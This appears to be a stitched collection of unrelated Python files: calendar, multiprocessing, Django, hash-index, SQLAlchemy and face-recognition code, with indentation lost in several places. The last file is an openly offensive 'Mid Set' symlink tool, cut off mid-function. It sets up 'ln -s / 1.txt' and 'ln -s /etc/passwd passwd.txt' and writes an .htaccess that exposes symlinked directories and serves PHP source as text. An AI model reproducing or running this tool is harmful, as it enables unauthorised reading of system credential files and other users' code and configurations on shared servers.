# Call the Calendar API
location_api_call = '{}apikey={}&q={}'.format(POSTAL_CODE_ENDPOINT,
API_KEY,
ZIP_CODE)
location_response = requests.get(location_api_call)
location_key = location_response.json()[0]['Key']
forecast_api_call = '{}/{}?apikey={}'.format(FORECAST_ENDPOINT,location_key,API_KEY)
forecast_response = requests.get(forecast_api_call)
#print(forecast_response.json())
events = []
    timezone = 'America/Los_Angeles'  # the Calendar API expects timeZone as a plain string (see the commented example below)
daily_forecasts = forecast_response.json()['DailyForecasts']
for forecast in daily_forecasts:
event ={}
start = {}
end = {}
high = int(forecast['Temperature']['Maximum']['Value'])
low = int(forecast['Temperature']['Minimum']['Value'])
weather = forecast['Day']['IconPhrase']
event_summary = '{} {} / {}'.format(weather,high,low)
event['summary'] = event_summary
date = forecast['Date'].split('T')[0]
start['date'] = date
start['timeZone'] = timezone
end['date'] = date
end['timeZone'] = timezone
event['start'] = start
event['end'] = end
events.append(event)
'''
event = {
'summary': 'Sunny and 75',
'start': {
'date': '2019-12-15',
'timeZone': 'America/Los_Angeles',
},
'end': {
'date': '2019-12-15',
'timeZone': 'America/Los_Angeles',
},
}
'''
with open('events/current.txt', 'r') as calendar_ids:
for _id in calendar_ids:
print(_id)
remove_event(service,_id.strip())
with open('events/current.txt', 'w') as calendar_ids:
for event in events:
event = service.events().insert(calendarId='primary', body=event).execute()
calendar_ids.write(event.get('id')+'\n')
if __name__ == '__main__':
main()
|
from .parse import parse_config
|
import multiprocessing
import time
testNUM = 0
def worker(interval, lock):
    # Declare the module-level counter; without this, "testNUM += 1" raises UnboundLocalError.
    # Note that each child process still increments its own copy of testNUM.
    global testNUM
    n = 5
    while n > 0:
        print("The time is {0}".format(time.ctime()))
        time.sleep(interval)
        n -= 1
        testNUM += 1
        print("testNUM is %d" % (testNUM))
if __name__ == "__main__":
    lock = multiprocessing.Lock()
    for x in range(0, 2):
        p = multiprocessing.Process(target=worker, args=(1, lock))
        p.start()
        print("p.pid:", p.pid)
        print("p.name:", p.name)
        print("p.is_alive:", p.is_alive())
|
print('mod_1 loaded!')
def mod_1_pr():
print('This is a function in mod_1!')
|
import numpy as np
a = np.array([1, 2, 3], dtype = complex)
print(a)
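# Prints: [1.+0.j 2.+0.j 3.+0.j]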
|
# -*- coding: utf-8 -*-
import SocketServer
from StringIO import StringIO
from avro import schema
from avro.datafile import DataFileReader
from avro.io import DatumReader
FILE_SCHEMA = schema.parse(open("../../avro/herring-box-data.avpc").read())
OUT_DIRECTORY = "backup/"
fileDict = dict()
class MyTCPHandler(SocketServer.BaseRequestHandler):
def handle(self):
data = self.request.recv(8024).strip()
data = StringIO(data)
reader = DataFileReader(data, DatumReader())
for fileData in reader:
id = fileData['id']
data = fileData['data']
print fileData
if not fileDict.has_key(id):
fileDict[id] = open("./" + id, "w")
f = fileDict[id]
f.write(data)
f.flush()
reader.close()
if __name__ == "__main__":
HOST, PORT = "localhost", 9999
server = SocketServer.TCPServer((HOST, PORT), MyTCPHandler)
    print "server started"
    server.serve_forever()
|
# Generated by Django 2.2.6 on 2019-11-25 08:37
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('work', '0041_auto_20191125_0813'),
]
operations = [
migrations.RenameModel(
old_name='Headline',
new_name='Resolution',
),
]
|
import heapq
import threading
from six import BytesIO
from six.moves import map
import numpy
from smqtk.algorithms.nn_index.hash_index import HashIndex
from smqtk.representation import get_data_element_impls
from smqtk.utils import merge_dict, plugin
from smqtk.utils.bit_utils import (
bit_vector_to_int_large,
int_to_bit_vector_large,
)
from smqtk.utils.metrics import hamming_distance
class LinearHashIndex (HashIndex):
"""
Basic linear index using heap sort (aka brute force).
Hash codes are stored as large integer values.
"""
@classmethod
def is_usable(cls):
return True
@classmethod
def get_default_config(cls):
"""
Generate and return a default configuration dictionary for this class.
This will be primarily used for generating what the configuration
dictionary would look like for this class without instantiating it.
By default, we observe what this class's constructor takes as arguments,
turning those argument names into configuration dictionary keys. If any
of those arguments have defaults, we will add those values into the
configuration dictionary appropriately. The dictionary returned should
only contain JSON compliant value types.
        It is not guaranteed that the configuration dictionary returned
from this method is valid for construction of an instance of this class.
:return: Default configuration dictionary for the class.
:rtype: dict
"""
c = super(LinearHashIndex, cls).get_default_config()
c['cache_element'] = plugin.make_config(get_data_element_impls())
return c
@classmethod
def from_config(cls, config_dict, merge_default=True):
"""
Instantiate a new instance of this class given the configuration
JSON-compliant dictionary encapsulating initialization arguments.
This method should not be called via super unless an instance of the
class is desired.
:param config_dict: JSON compliant dictionary encapsulating
a configuration.
:type config_dict: dict
:param merge_default: Merge the given configuration on top of the
default provided by ``get_default_config``.
:type merge_default: bool
:return: Constructed instance from the provided config.
:rtype: LinearHashIndex
"""
if merge_default:
config_dict = merge_dict(cls.get_default_config(), config_dict)
cache_element = None
if config_dict['cache_element'] \
and config_dict['cache_element']['type']:
cache_element = \
plugin.from_plugin_config(config_dict['cache_element'],
get_data_element_impls())
config_dict['cache_element'] = cache_element
return super(LinearHashIndex, cls).from_config(config_dict, False)
def __init__(self, cache_element=None):
"""
Initialize linear, brute-force hash index.
:param cache_element: Optional data element to cache our index to.
:type cache_element: smqtk.representation.DataElement | None
"""
super(LinearHashIndex, self).__init__()
self.cache_element = cache_element
# Our index is the set of bit-vectors as an integers/longs.
#: :type: set[int]
self.index = set()
self._model_lock = threading.RLock()
self.load_cache()
def get_config(self):
c = self.get_default_config()
if self.cache_element:
c['cache_element'] = merge_dict(c['cache_element'],
plugin.to_plugin_config(
self.cache_element))
return c
def load_cache(self):
"""
Load from file cache if we have one
"""
with self._model_lock:
if self.cache_element and not self.cache_element.is_empty():
buff = BytesIO(self.cache_element.get_bytes())
self.index = set(numpy.load(buff))
def save_cache(self):
"""
        Save to file cache if configured.
"""
with self._model_lock:
if self.cache_element and self.index:
if self.cache_element.is_read_only():
raise ValueError("Cache element (%s) is read-only."
% self.cache_element)
buff = BytesIO()
# noinspection PyTypeChecker
numpy.save(buff, tuple(self.index))
self.cache_element.set_bytes(buff.getvalue())
def count(self):
with self._model_lock:
return len(self.index)
def _build_index(self, hashes):
"""
Internal method to be implemented by sub-classes to build the index with
the given hash codes (bit-vectors).
Subsequent calls to this method should rebuild the current index. This
        method shall not add to the existing index, nor raise an exception, so
        as to protect the current index.
:param hashes: Iterable of descriptor elements to build index
over.
:type hashes: collections.Iterable[numpy.ndarray[bool]]
"""
with self._model_lock:
new_index = set(map(bit_vector_to_int_large, hashes))
self.index = new_index
self.save_cache()
def _update_index(self, hashes):
"""
Internal method to be implemented by sub-classes to additively update
the current index with the one or more hash vectors given.
If no index exists yet, a new one should be created using the given hash
vectors.
:param hashes: Iterable of numpy boolean hash vectors to add to this
index.
:type hashes: collections.Iterable[numpy.ndarray[bool]]
"""
with self._model_lock:
self.index.update(set(map(bit_vector_to_int_large, hashes)))
self.save_cache()
def _remove_from_index(self, hashes):
"""
Internal method to be implemented by sub-classes to partially remove
hashes from this index.
:param hashes: Iterable of numpy boolean hash vectors to remove from
this index.
:type hashes: collections.Iterable[numpy.ndarray[bool]]
:raises KeyError: One or more hashes provided do not match any stored
hashes. The index should not be modified.
"""
with self._model_lock:
h_int_set = set(map(bit_vector_to_int_large, hashes))
# KeyError if any hash ints are not in our index map.
for h in h_int_set:
if h not in self.index:
raise KeyError(h)
self.index = self.index - h_int_set
self.save_cache()
def _nn(self, h, n=1):
"""
Internal method to be implemented by sub-classes to return the nearest
`N` neighbor hash codes as bit-vectors to the given hash code
bit-vector.
Distances are in the range [0,1] and are the percent different each
neighbor hash is from the query, based on the number of bits contained
in the query (normalized hamming distance).
When this internal method is called, we have already checked that our
index is not empty.
:param h: Hash code to compute the neighbors of. Should be the same bit
length as indexed hash codes.
:type h: numpy.ndarray[bool]
:param n: Number of nearest neighbors to find.
:type n: int
:return: Tuple of nearest N hash codes and a tuple of the distance
values to those neighbors.
:rtype: (tuple[numpy.ndarray[bool]], tuple[float])
"""
with self._model_lock:
h_int = bit_vector_to_int_large(h)
bits = len(h)
#: :type: list[int|long]
near_codes = \
heapq.nsmallest(n, self.index,
lambda e: hamming_distance(h_int, e)
)
distances = map(hamming_distance, near_codes,
[h_int] * len(near_codes))
return [int_to_bit_vector_large(c, bits) for c in near_codes], \
[d / float(bits) for d in distances]
|
__author__ = 'Elisabetta Ronchieri'
import commands
import os
from tstorm.utils import utils
class Grep:
def __init__(self, fn='/var/log/storm/storm-frontend-server.log'):
self.ifn = fn
self.cmd = {
'name':'grep'
}
self.ipt_strings = 'Cannot add or update a child row: a foreign key constraint fails'
self.otpt = {
'status':''}
def get_command(self):
        a = self.cmd['name'] + ' "' + self.ipt_strings + '" ' + self.ifn  # note the space after the command name
return a
def run_command(self):
a=()
if utils.cmd_exist(self.cmd['name']):
a=commands.getstatusoutput(self.get_command())
return a
def get_output(self):
a=self.run_command()
if a[0] == 0:
self.otpt['status'] = 'PASS'
else:
self.otpt['status'] = 'FAILURE'
return self.otpt
|
# Generated by Django 3.2.7 on 2021-09-22 17:09
from django.db import migrations, models
import uuid
class Migration(migrations.Migration):
dependencies = [
('api', '0001_initial'),
]
operations = [
migrations.RemoveField(
model_name='targetfile',
name='file_name',
),
migrations.RemoveField(
model_name='targetfile',
name='file_type',
),
migrations.AddField(
model_name='targetfile',
name='file_uri',
field=models.URLField(default=None),
),
migrations.AlterField(
model_name='targetfile',
name='description',
field=models.TextField(default=''),
),
migrations.AlterField(
model_name='targetfile',
name='identifier',
field=models.UUIDField(default=uuid.uuid4, primary_key=True, serialize=False),
),
migrations.AlterField(
model_name='targetfile',
name='size_bytes',
field=models.IntegerField(default=0),
),
]
|
""" calcular el factorial de
un numero
"""
def factorial(n):
if n==0:
return 1
else:
res=n
for conta in range(1,n):
res=res*conta
return res
print(factorial(0)) #1
print(factorial(1)) #1
print(factorial(3)) #6
print(factorial(5)) #120
print(factorial(9)) #362,880
|
import pymysql
pymysql.install_as_MySQLdb()
# By default SQLAlchemy talks to MySQL through MySQLdb; that package exists for Python 2 but not Python 3, so install pymysql and register it as MySQLdb (install_as_MySQLdb above)
from sqlalchemy import create_engine, MetaData, Table, Column, Integer, String, ForeignKey
DB_CONNECT_STRING = "mysql://root:mysql@127.0.0.1:3306/sqlalchemy_study"
engine = create_engine(DB_CONNECT_STRING, echo=True)
# engine = create_engine(DB_CONNECT_STRING, echo=True) # echo=True prints the generated SQL / debug output
metadata = MetaData(engine) # the engine is bound when the MetaData is created
# print(metadata)
# user_table = Table('user', metadata,
# Column('id', Integer, primary_key=Table),
# Column('name', String(50)),
# Column('fullname', String(100))
# )
#
# address_table = Table('address', metadata,
# Column('id', Integer, primary_key=Table),
# Column('user_id', None, ForeignKey('user.id')),
# Column('email', String(128), nullable=False)
# )
#
# metadata.create_all() # automatically checks whether the tables already exist
# If no engine was passed when the MetaData was created, this would have to be metadata.create_all(engine)
# Besides metadata.create_all(), a Table also has its own create method:
# table.create(bind=engine, checkfirst=False)
# user_table.create(checkfirst=False) # bind is usually the engine and can be omitted when the MetaData is bound; with checkfirst=True an existing table is silently skipped, with False an exception is raised
# address_table.create(checkfirst=False)
# Reflect existing tables instead of creating them again, using autoload=True
user_table = Table('user', metadata, autoload=True)
# print('user' in metadata.tables) # check that the reflection worked, True
# print('address' in metadata.tables) # False
# print([c.name for c in user_table.columns]) # list the column names
# Reflection: if a reflected table has a foreign key to another table, the referenced table is reflected too. E.g. reflecting only the address table also pulls in the user table.
address_table = Table('address', metadata, autoload=True)
# print('user' in metadata.tables) # True
# Insert data
# Before inserting data there must be a Table object, whether newly created or obtained via reflection
# ins = user_table.insert() # returns an Insert object; printing it shows the corresponding SQL statement
# print(ins)
# ins = ins.values(id="1",name='zhangsan',fullname='nigulasiZhangSan')
# Execute the insert
# conn = engine.connect()
# result = conn.execute(ins)
# Execute multiple statements
# Pass the parameters in through execute()
ins = user_table.insert()
conn = engine.connect()
# conn.execute(ins, name="zhangsan", fullname="nigulasi zhaosi")
# To insert several records at once, pass execute() a list of dicts (every dict must use the same keys)
# conn.execute(address_table.insert(),[
# {'user_id':1, "email": "sprinfall@gmail.com"},
# {'user_id':1, "email": "sprinfall@hotmail.com"},
# ])
# Query data
cur = conn.execute('select * from address;')
res = cur.fetchall()
print(res)
|
#!/usr/bin/env python3
from ..lib import keyword_utils
from ..feature_analyzer.casual_analyzer import get_chkval_cond
'''
"causality": {
"pre.call": {
"func_name": {
used_as_arg: false,
share_argument: true,
}, ...
}
"post.call": {
"func_name": {
used_as_arg(use_target_as_arg): true,
share_argument: false,
}, ...
}
}
'''
def check_causality(target, causal_feature_map, complete_feature, doc_feature={}):
feature = complete_feature['causality']
alarm_text = ""
pre_functions = causal_feature_map['pre_functions']
post_functions = causal_feature_map['post_functions']
doc_pre_functions = []
doc_post_functions = []
if "causality" in doc_feature:
doc_pre_functions = doc_feature['causality']['pre']
doc_post_functions = doc_feature['causality']['post']
# Skip the pre function if the function is known as usual pre functions.
if keyword_utils.is_subsequent(target):
alarm_text += check_causal_feature(target, feature, "pre.call", pre_functions, doc_pre_functions)
if not is_error_handling(complete_feature, doc_feature):
# Skip the post function if the function is known as usual post functions.
# And lazily ignore it if the return is not used at all...
if not keyword_utils.is_post(target) and ret_is_used(complete_feature):
chkval_cond = get_chkval_cond(complete_feature)
alarm_text += check_causal_feature(target,
feature,
"post.call",
post_functions,
doc_post_functions,
chkval_cond=chkval_cond)
# Record double-free-related cases.
elif len(feature['post.call']) == 1 and keyword_utils.is_post(target) \
and target in feature['post.call'] and target not in feature['pre.call']:
alarm_text += f"Potential: duplicated call of {target} in post.call. "
return True, alarm_text
def is_global(complete_feature=None):
if complete_feature != None:
if 'retval' in complete_feature and 'ctx' in complete_feature['retval']:
if complete_feature['retval']['ctx']['indir_returned'] \
or complete_feature['retval']['ctx']['returned'] \
or complete_feature['retval']['ctx']['stored_not_local']:
return True
return False
def ret_is_used(complete_feature=None):
if complete_feature != None and not is_global(complete_feature):
if 'retval' in complete_feature and 'ctx' in complete_feature['retval']:
if complete_feature['retval']['check']['checked'] or \
complete_feature['retval']['check']['indir_checked'] or \
complete_feature['retval']['ctx']['derefed_read'] or \
complete_feature['retval']['ctx']['derefed_write'] or \
complete_feature['retval']['ctx']['used_in_bin'] or \
complete_feature['retval']['ctx']['used_in_call']:
return True
else: # no return..
return True
return False
def check_causal_feature(target, feature, causal_type, functions, doc_functions, chkval_cond=None):
if ignore_causal(target, causal_type, feature[causal_type]):
return ""
alarm_text = ""
for causal_func in functions:
# If the frequency is 1
frequency = functions[causal_func] if causal_type == "pre.call" \
else functions[causal_func][0]
if frequency == 1:
continue
# For post.call # chkval_cond != "no_check" and
if chkval_cond != None and functions[causal_func][1] != {}:
if chkval_cond not in functions[causal_func][1]:
continue
# Consider the direct variants
for func in feature[causal_type]:
if causal_func in func:
causal_func = func
break
# Check whether have the causal function
if causal_func not in feature[causal_type]:
alarm_text += f"Lack {causal_type}: {causal_func}. "
# If there are many classes, then we only detect the most-frequent
if len(functions) > 2:
break
if alarm_text == "" and len(doc_functions) > 0:
has_doc_func = False
for doc_func in doc_functions:
if doc_func in feature[causal_type]:
has_doc_func = True
if not has_doc_func:
alarm_text += f"Lack one of them in {causal_type}: {doc_functions}. (by documents spec.) "
return alarm_text
def ignore_causal(target, causal_type, functions):
for func in functions:
if causal_related(func, causal_type) \
and has_same_prefix(target, func, causal_type):
return True
return False
def causal_related(func_name, causal_type):
if causal_type == "pre.call":
if keyword_utils.is_pre(func_name):
return True
else:
if keyword_utils.is_post(func_name):
return True
return False
def has_same_prefix(target, causal_func, causal_type):
length = len(target) if len(target) > len(causal_func) else len(target)
idx = 0
if causal_type == "post.call":
if '_' in target:
idx = len(target) - target[::-1].index('_') - 1
else:
for idx in range(length):
if not keyword_utils.is_pre_seq(target[idx:]):
break
if idx < length:
if keyword_utils.is_pre_seq(target[idx:]) == keyword_utils.is_post(causal_func[idx:]) \
or (idx > 0 and target[:idx] == causal_func[:idx]):
return True
else:
if '_' in target:
idx = len(target) - target[::-1].index('_') - 1
else:
for idx in range(length):
if not keyword_utils.is_subsequent(target[idx:]):
break
if idx < length:
if keyword_utils.is_subsequent(target[idx:]) == keyword_utils.is_pre(causal_func[idx:]) \
or (idx > 0 and target[:idx] == causal_func[:idx]):
return True
return False
def is_error_handling(complete_feature, doc_feature):
if "ret" not in doc_feature:
return False
if "success" not in doc_feature['ret']['cond'] \
and "fail" not in doc_feature['ret']['cond']:
return False
if 'retval' in complete_feature:
ret_check = complete_feature['retval']['check']
if ret_check['checked'] and not ret_check['compared_with_non_const'] \
and not ret_check['indir_checked']:
retval = ret_check['compared_with_const']
retcond = ret_check['check_cond']
if retval in doc_feature['ret']['value']:
idx = doc_feature['ret']['value'].index(retval)
cond = doc_feature['ret']['cond'][idx]
if (cond == "success" and retcond in ["ne", "lt", "gt"]) \
or (cond == "fail" and retcond in ["eq", "le", "ge"]):
return True
return False
|
from typing import Tuple
from torch import nn, Tensor
from torch.nn import MultiheadAttention
from parseridge.parser.modules.add_and_norm_layer import AddAndNormLayer
from parseridge.parser.modules.data_parallel import Module
class SelfAttentionLayer(Module):
def __init__(self, model_size: int, num_heads: int, **kwargs):
super().__init__(**kwargs)
self.input_size = self.output_size = model_size
self.num_heads = num_heads
self.multihead_attention = MultiheadAttention(
embed_dim=self.input_size, num_heads=num_heads
)
self.attention_norm = AddAndNormLayer(model_size=self.input_size)
self.linear_layer = nn.Sequential(
nn.Linear(in_features=self.input_size, out_features=4 * self.input_size),
nn.ReLU(),
nn.Linear(in_features=4 * self.input_size, out_features=self.input_size),
)
self.linear_layer_norm = AddAndNormLayer(model_size=self.input_size)
def forward(self, sequence: Tensor, mask: Tensor) -> Tuple[Tensor, Tensor]:
# [Batch, Sequence, Embedding] -> [Sequence, Batch, Embedding]
sequence_by_sent = sequence.transpose(0, 1)
attention_output, attention_weights = self.multihead_attention(
query=sequence_by_sent,
key=sequence_by_sent,
value=sequence_by_sent,
key_padding_mask=mask,
)
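        # With the default settings, nn.MultiheadAttention returns weights averaged over the heads, shaped [Batch, Sequence, Sequence].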
# [Sequence, Batch, Embedding] -> [Batch, Sequence, Embedding]
attention_output = attention_output.transpose(0, 1)
attention_output = self.attention_norm(input=sequence, output=attention_output)
attention_output = self.linear_layer_norm(
input=attention_output, output=self.linear_layer(attention_output)
)
return attention_output, attention_weights
|
import random
aluno = [0, 1, 2, 3]
for x in range(4):
    aluno[x] = input('Enter student no. {}: '.format(x + 1))
print('The drawn student is {}'.format(aluno[random.randint(0, 3)]))
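# random.randint(0, 3) is inclusive on both ends, so any of the four entered names can be drawn.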
|
#!/usr/bin/env python
# coding: utf-8
# In[ ]:
a = 1
def x():
return 2
|
from django.shortcuts import render
from common.models import Injection, CRI, Prescription
def info(request):
"""Displays all medications in the db."""
inj = Injection.objects.all()
cri = CRI.objects.all()
pre = Prescription.objects.all()
return render(request, 'info/info.html', {'navbar': 'info',
'inj': inj,
'cri': cri,
'pre': pre})
# The following views get a specific medication based on a slug passed from the base info view.
def info_inj(request, slug):
inj = Injection.objects.get(slug=slug)
return render(request, 'info/rx.html', {'navbar': 'info',
'rx': inj})
def info_cri(request, slug):
cri = CRI.objects.get(slug=slug)
return render(request, 'info/rx.html', {'navbar': 'info',
'rx': cri})
def info_pre(request, slug):
pre = Prescription.objects.get(slug=slug)
return render(request, 'info/rx.html', {'navbar': 'info',
'rx': pre})
|
# Generated by Django 2.1.5 on 2019-01-18 07:34
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('advertisement', '0004_auto_20190116_1354'),
]
operations = [
migrations.RemoveField(
model_name='advertisement',
name='total_views',
),
migrations.RemoveField(
model_name='advertisement',
name='unique_views',
),
]
|
# def add(am1, am2):
# test_suite_matrix(am1, am2)
#
# length_outer = len(am1)
# length_inner = len(am1[0])
#
# result_matrix = []
# result_matrix = [[result_matrix for i in range(length_inner)] for j in range(length_outer)]
#
# for o in range(length_outer):
# for i in range(length_inner):
# result_matrix[o][i] = am1[o][i] + am2[o][i]
#
# print(result_matrix)
#
#
# def test_suite_matrix(m1, m2):
# assert len(m1) == len(m2)
# print("Test 1 Check")
def add(*am):
# test_suite_matrix(am)
print(am)
argument_len = len(am)
length_outer = len(am[0])
length_inner = len(am[0][0])
print(length_outer)
print(length_inner)
result_matrix = [[0 for i in range(length_inner)] for j in range(length_outer)]
for args in range(argument_len):
for o in range(length_outer):
for i in range(length_inner):
result_matrix[o][i] += am[args][o][i]
print(result_matrix)
#
# def test_suite_matrix(m1, m2):
# assert len(m1) == len(m2)
# print("Test 1 Check")
matrix1 = [[1, -2], [-3, 4]]
matrix2 = [[2, -1], [0, -1]]
matrix3 = [[-3, 3], [3, -3]]
add(matrix1, matrix2, matrix3)
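# For the three matrices above, the printed element-wise sum is [[0, 0], [0, 0]].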
matrix1 = [[1, -2, 3], [-4, 5, -6], [7, -8, 9]]
matrix2 = [[1, 1, 0], [1, -2, 3], [-2, 2, -2]]
add(matrix1, matrix2)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Dec 10 16:26:36 2018
@author: andr
"""
import os
from datetime import datetime, timedelta
import numpy as np
import matplotlib.pyplot as plt
os.system("rm res_iter_coords.txt")
with open('0943_fk_start.par', 'r') as file:
lines = file.readlines()
ra = datetime.strptime(lines[1][11:-1], '%H:%M:%S')
dec = datetime.strptime(lines[2][11:-1], '%H:%M:%S')
for sec_ra in range(60):
for sec_dec in range(60):
ra += timedelta(seconds=sec_ra)
dec += timedelta(seconds=sec_dec)
lines[1] = 'RAJ ' + ra.strftime('%H:%M:%S') + ' 1' + '\n'
lines[2] = 'DECJ ' + dec.strftime('%H:%M:%S') + ' 1' + '\n'
with open('0943_fk.par', 'w') as file:
for line in lines:
file.write(line)
os.system("tempo 0943_fk.tim")
os.system("~/work/tempo/util/print_resid/./print_resid -mre > resid.ascii")
data = np.genfromtxt("resid.ascii").T
with open('res_iter_coords.txt', 'a') as file:
file.write(ra.strftime('%H:%M:%S') + ' ')
file.write(dec.strftime('%H:%M:%S') + ' ')
file.write(str(np.std(data[1])))
file.write('\n')
data = np.genfromtxt('res_iter_coords.txt').T
plt.close()
plt.plot(data[2])
plt.savefig('res_iter_coords.png', format='png', dpi=150)
|
''' Functions '''
import math
# Module file: funciones.py
def detectaDiferenciaPosicion(p1, coords2):
    '''Returns 1 if the point coords2 lies within the radius (p1.size) of p1, else 0'''
puntoX, puntoY = coords2
if math.hypot((p1.x-puntoX),(p1.y-puntoY))<=p1.size:
return 1
else:
return 0
def sumaFuerzas(f1,f2):
    '''Adds two forces'''
return [f1[0]+f2[0], f1[1]+f2[1]]
def addVectors(v1, v2):
    ''' Adds two generic vectors of the form (r, theta) '''
r1, theta1 = v1
r2, theta2 = v2
x = math.cos(theta1) * r1 + math.cos(theta2) * r2
y = math.sin(theta1) * r1 + math.sin(theta2) * r2
theta = math.atan2(y, x)
r = math.hypot(x, y)
return [r, theta]
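# e.g. addVectors([1, 0], [1, math.pi / 2]) returns approximately [1.414, 0.785], i.e. (r, theta).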
def transformaCartesiano(vector): # (r, theta)
    '''Wind is easier to represent in Cartesian coordinates'''
    return [vector[0]*math.cos(vector[1]), -vector[0]*math.sin(vector[1])] # the minus sign is because the reference system is inverted
def transformaAngular(vector):
return [math.hypot(vector[0], vector[1]), math.atan2(-vector[1], vector[0])]
|
import json
import hashlib
class My_iterator:
def __init__(self, file_name: str):
self.start = -1
with open(file_name, 'r', encoding='utf8') as file:
self.countries = json.load(file)
def __iter__(self):
return self
def __next__(self):
self.start += 1
if self.start == len(self.countries):
raise StopIteration
return self.countries[self.start]['name']['common']
if __name__ == '__main__':
list_countries = My_iterator('countries.json')
with open('res.txt', 'w', encoding='utf8') as file:
count = 0
for country in list_countries:
count += 1
file.write(f'{country} - https://ru.wikipedia.org/wiki/{country.replace(" ", "_")}\n')
def LineReader(filename: str):
with open(filename, 'r', encoding='utf8') as my_file:
while True:
line = my_file.readline()
if line:
yield hashlib.md5(line.encode('utf8')).hexdigest()
else:
break
for item in LineReader('res.txt'):
print(item)
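# Each value printed above is the 32-character hexadecimal MD5 digest of one line from res.txt.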
|
from pico2d import * # C:\Users\enjcat\AppData\Local\Programs\Python\Python36\lib\site-packages\pico2d
import game_framework
import random
import game_world
import random
import Wepon
dicts = {0:Wepon.stick,1:Wepon.sword,2:Wepon.ice,3:Wepon.fire,4:Wepon.wand,5:Wepon.heal}
class Tower:
def __init__(self):
print("Creating..")
self.image = load_image('./res/popmap.png')
self.x = 150
self.y = 150
self.frame = 0
self.speed = 3
self.on = 0
def draw(self):
self.image.clip_draw(int(self.frame) * 200, 0, 200, 200, get_canvas_width()/2, get_canvas_height()/2)
def update(self):
if(self.on == 1):
self.frame = self.frame + 0.2
if self.frame >= 4:
self.on = 0
rand = random.randint(0,100)
if(rand < 40):
game_world.add_object(dicts[5](),game_world.layer_obstacle)
elif(rand < 65):
game_world.add_object(dicts[0](),game_world.layer_obstacle)
elif(rand < 85):
game_world.add_object(dicts[1](),game_world.layer_obstacle)
elif(rand < 92):
game_world.add_object(dicts[2](),game_world.layer_obstacle)
elif(rand < 99):
game_world.add_object(dicts[3](),game_world.layer_obstacle)
elif(rand < 100):
game_world.add_object(dicts[4](),game_world.layer_obstacle)
if(self.on == 0 and self.frame > 0):
self.frame -= 0.2
def pop(self):
self.on = 1
|
from urllib.request import urlopen
from bs4 import BeautifulSoup
html = urlopen("http://pythonscraping.com/pages/page1.html")
def main():
"""
Starting out with BeautifulSoup
:return:
"""
obj = BeautifulSoup(html.read(), "lxml")
print(obj.h1)
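    # obj.h1 resolves to the first <h1> element of the parsed page; printing a Tag prints its HTML markup.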
return None
if __name__ == "__main__":
main()
|
import requests as r
import json
import time
URL='http://127.0.0.1:8001/api/studios'
def bodrder():
print("\n-----------------------")
print('View all records;')
print(r.get(URL).text)
bodrder()
print('View a specific record (success)')
print(r.get(URL+'/7').text)
bodrder()
print('View a specific record (failure - no such record)')
print(r.get(URL+'100500').text)
bodrder()
print('Sort by name, descending')
print(r.get(URL,params={'order':'d'}).text)
bodrder()
print('Sort by name, ascending')
print(r.get(URL,params={'order':'a'}).text)
bodrder()
print('Filter across all fields')
print(r.get(URL,params={'filter':'Дубай'}).text)
bodrder()
print('Pagination ')
print(r.get(URL,params={'pagination':'5'}).text)
bodrder()
print("Average rating of the studios' films ")
print(r.get(URL+'/avg_rate').text)
bodrder()
print('Add a studio - error (no data is passed)')
print(r.post(URL).text)
bodrder()
print('Add a studio (all good)')
print(r.post(URL, json={'name':'9898','country':'5','city':'5'}).text)
bodrder()
print('Update a record')
print(r.put(URL+'/1',json={'name':'6','country':'5','city':'5'}).text)
bodrder()
print('Delete a studio (the tables are related, hence 406)')
print(r.delete(URL+'/1').text)
bodrder()
|
#!/usr/bin/env python
import numpy as np
import cv2
import cv2.cv as cv
from video import create_capture
from common import clock, draw_str
import facedetect as fd
import Train_Common as tc
help_message = '''
USAGE: facedRec_LBP.py [--cascade <cascade_fn>] [--nested-cascade <cascade_fn>] [--model-name <ModelName>] [--label-name <LabelName>]
'''
out = cv2.VideoWriter('output.avi', -1, 20.0, (640,480))
if __name__ == '__main__':
import sys, getopt
args, video_src = getopt.getopt(sys.argv[1:], '', ['cascade=', 'nested-cascade=', 'model-name=', 'label-name='])
try: video_src = video_src[0]
except: video_src = 0
args = dict(args)
cascade_fn = args.get('--cascade', "haarcascades/haarcascade_frontalface_alt.xml")
nested_fn = args.get('--nested-cascade', "haarcascades/haarcascade_eye.xml")
ModelName = args.get('--model-name', "Model_default.yml")
LabelName = args.get('--label-name', "Label_default.txt")
cascade = cv2.CascadeClassifier(cascade_fn)
nested = cv2.CascadeClassifier(nested_fn)
reconizer = cv2.createLBPHFaceRecognizer()
reconizer.load(ModelName)
cam = create_capture(video_src, fallback='synth:bg=../cpp/lena.jpg:noise=0.05')
Name, Labels = tc.Read_List_Label(LabelName)
while True:
ret, img = cam.read()
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
gray = cv2.equalizeHist(gray)
t = clock()
rects = fd.detect(gray, cascade)
vis = img.copy()
fd.draw_rects(vis, rects, (0, 255, 0))
for x1, y1, x2, y2 in rects:
roi = gray[y1:y2, x1:x2]
vis_roi = vis[y1:y2, x1:x2]
subrects = fd.detect(roi.copy(), nested)
fd.draw_rects(vis_roi, subrects, (255, 0, 0))
label, distance = reconizer.predict(roi)
draw_str(vis, (x1, y2+15), '%.1f' % (distance))
if(distance < 300):
draw_str(vis, (x1, y2), '%s' % (Name[label]))
else:
draw_str(vis, (x1, y2), '%s' % ("Known H"))
dt = clock() - t
draw_str(vis, (20, 20), 'time: %.1f ms' % (dt*1000))
cv2.imshow('facedetect', vis)
#cv2.imwrite("x121_0.png", vis)
# write the flipped frame
out.write(vis)
if 0xFF & cv2.waitKey(5) == 27:
break
cv2.destroyAllWindows()
cam.release()
out.release()
|
#!/usr/bin/python3
import sys, socket, os, subprocess
if sys.platform == 'linux-i386' or sys.platform == 'linux2' or sys.platform == 'darwin':
SysCls = 'clear'
symlink = 'ln -s / 1.txt'
pwd = ('pwd')
create = ('mkdir sym')
cd = ('cd sym')
passwd = ('ln -s /etc/passwd passwd.txt')
print "\n|---------------------------------------------|"
print "| ##~ Mid Set LoC ReAd |"
print "| 2015 midset.py |"
print "| - Linux server read files |"
print "| Read /etc/passwd >> passwd.txt |"
print "| GreeTz : HsN,Hiso,marco,vir,oudouz,ked,D3v |"
print "| All Rights Reserved @ Mid-Set |"
print "| C0ntact : http://fb.com/midset00 |"
print "|----------------------------------------------|\n"
print "|----------------------------------------------|\n"
def sym():
htacess = open ('.htaccess' , 'w')
inputx = 'Options Indexes FollowSymLinks \nDirectoryIndex ssssss.htm \nAddType txt .php \nAddHandler txt .php'
